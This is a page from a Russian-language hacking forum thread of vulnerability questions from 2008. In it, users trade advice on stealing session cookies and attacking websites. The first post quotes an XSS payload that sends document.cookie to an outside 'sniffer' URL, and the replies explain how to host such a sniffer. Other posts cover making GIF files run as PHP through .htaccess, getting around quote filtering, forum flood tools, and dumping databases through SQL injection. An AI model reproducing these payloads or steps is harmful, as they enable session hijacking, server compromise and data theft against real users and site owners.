ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
 
Страница 140 из 1393 « Первая < 4090130 136 137 138 139 140 141 142 143 144 1501902406401140 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1391  
Старый 25.03.2008, 01:37
samarin
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
Провел на форуме:
295283

Репутация: 69
Отправить сообщение для samarin с помощью ICQ
По умолчанию
нужна помощь в xss, пытаюсь изучать, но много непонятных мелочей.
предположим нужная мне xss
Цитата:
'><script>img = new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie;</script>
насколько я смог понять куки записываются в картику hacknet.gif, т.е у меня должен быть свой сайт с картинкой, которую разрешено изменять на этом сайте без авторизации?или неправильно понял?
Думаю идея вопроса более-менее понятна.
Разъясните мне пожалуйста эти детали
 

  #1392  
Старый 25.03.2008, 01:41
159932
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038

Репутация: 1385


По умолчанию
нет это просто ссылка на сниффер
 

  #1393  
Старый 25.03.2008, 01:52
samarin
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
Провел на форуме:
295283

Репутация: 69
Отправить сообщение для samarin с помощью ICQ
По умолчанию
собственно сам вопрос
Цитата:
http://forum.antichat.ru/showpost.php?p=632546&postcount=1410
Цитата:
нет это просто ссылка на сниффер
ок, где взять этот снифер, как и где его разестить?
---------------------------------------------------------------------
разьясните пожалуйста детали про получение куков
 

  #1394  
Старый 25.03.2008, 02:47
Sharingan
Участник форума
Регистрация: 05.05.2007
Сообщений: 171
Провел на форуме:
1050662

Репутация: 435
Отправить сообщение для Sharingan с помощью ICQ
По умолчанию
_http://forum.antichat.ru/thread18555.html поиском пользоваться не барское дело?
Вот собственно помощ по гринбировскому сниферу
_http://forum.antichat.ru/thread36829.html
все понятно написано
 

  #1395  
Старый 25.03.2008, 04:48
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379

Репутация: 3812


Отправить сообщение для +toxa+ с помощью ICQ Отправить сообщение для +toxa+ с помощью AIM
По умолчанию
Ужс как всё сложно =\
сливаешь http://old.antichat.ru/soft/s.zip, распаковываешь, заливаешь на сервер с поддержкой php, правишь конфиг (если таковой имеется) и всё. вставляешь в скрипт ссылку на сниффер
__________________
 

  #1396  
Старый 26.03.2008, 11:34
MaSter GeN
Познающий
Регистрация: 26.01.2008
Сообщений: 71
Провел на форуме:
280720

Репутация: 141
Отправить сообщение для MaSter GeN с помощью ICQ
По умолчанию
сорри елли не туда
возник вот такой вопрос есть ли вожможность обхода фильтрации ковычки через функцию quote() ?
 

  #1397  
Старый 26.03.2008, 16:45
Rogun
Познающий
Регистрация: 12.02.2008
Сообщений: 90
Провел на форуме:
535943

Репутация: 20
Отправить сообщение для Rogun с помощью ICQ
По умолчанию
Есть ли другие флуд-проги на форумах (IPB) помимо Antiturk(Denyo Lauch)?
(при отсутствии ограничений содавать много тем либо сообщений)
 

  #1398  
Старый 26.03.2008, 16:51
Ershik
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167

Репутация: 100
По умолчанию
Если создать файл .htaccess и вписать в него следующую строчку:
AddTypeapplication/x-httpd-php gif - то все файлы с gif будут интрепетироваться как php файлы.
Я так и сделал. Создать .htaccess. Вписал в него строку и решил проверить для начала на своем сайте. Закинул, полез, но система выдала предупреждение, что 500 ошибка. Вообщем, файл был недоступен.
Почему? И как это можно исправить?
 

  #1399  
Старый 26.03.2008, 18:41
m0use
Познающий
Регистрация: 22.02.2006
Сообщений: 50
Провел на форуме:
256744

Репутация: 16
Отправить сообщение для m0use с помощью ICQ
По умолчанию
каким образом можно сделать дамп всей базы данных
 

  #1400  
Старый 26.03.2008, 19:05
MaSter GeN
Познающий
Регистрация: 26.01.2008
Сообщений: 71
Провел на форуме:
280720

Репутация: 141
Отправить сообщение для MaSter GeN с помощью ICQ
По умолчанию
Цитата:
Сообщение от m0use  
каким образом можно сделать дамп всей базы данных
у тя доступ к базе есть или через скуль ?
если есть доступ к базе тогда почти через любой mysql клиент ежели через скуль Тогда попробуй через "SQL Injection Tool"

2Ershik
а в одном посте не судьба написать ?
такую строчку к своему добавь removehandler.gif отменяет настройки по умолчанию для файлов.gif
Последний раз редактировалось MaSter GeN; 26.03.2008 в 19:15..
 
 
Страница 140 из 1393 « Первая < 4090130 136 137 138 139 140 141 142 143 144 1501902406401140 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ